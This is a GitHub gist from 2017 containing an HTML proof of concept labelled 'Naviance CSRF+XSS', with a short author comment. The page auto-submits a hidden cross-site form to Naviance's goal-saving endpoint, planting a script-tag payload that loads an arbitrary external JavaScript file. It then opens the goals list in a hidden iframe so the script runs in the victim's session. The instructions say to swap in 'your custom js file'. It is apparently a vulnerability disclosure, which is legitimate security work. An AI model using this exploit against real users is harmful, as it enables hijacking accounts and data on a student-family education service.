Skip to content

Instantly share code, notes, and snippets.

@Arinerron

Arinerron/naviance.html

Created April 11, 2017 00:20
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Arinerron/4a4074a0054d8d0e87ccec53628354af to your computer and use it in GitHub Desktop.
Save Arinerron/4a4074a0054d8d0e87ccec53628354af to your computer and use it in GitHub Desktop.
Download ZIP
Naviance CSRF+XSS / proof of concept
Raw
naviance.html
<html>
<body>
<!--
Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
To test it out, replace "[jsfile]" with "https://arinerron.com/js/script.js".
-->
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='https://connection.naviance.com/family-connection/success-planner/goals/save' target="csrf-frame" id="csrf-form">
<input type='hidden' name='attr1' value="pwned">
<input type='hidden' name='attr2' value="pwned">
<input type='hidden' name='cid' value="1">
<input type='hidden' name='todo-priority' value='High'>
<input type='hidden' name='id' value=''>
<input type='hidden' name='task_deadline' value=''>
<input type='hidden' name='task_title' value=''>
<input type='hidden' name='title' value="&'&gt;&quot;&gt;);'&gt;&quot;&gt;&lt;/script&gt;&lt;/a&gt;&lt;script src=&quot;[jsfile]&quot;&gt;&lt;/script&gt;">
<input style="display:none" type='submit' value='submit'>
</form>
<script>
document.getElementById("csrf-form").submit();
</script>
<iframe style="display:none" src="https://connection.naviance.com/family-connection/success-planner/goals/"></iframe>
done
</body>
@Arinerron
Copy link
Author

It uses CSRF to make a new TODO note and set the name of it to an XSS payload. Then, it makes an iframe to load the page that lists the TODOs so that payload is executed.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment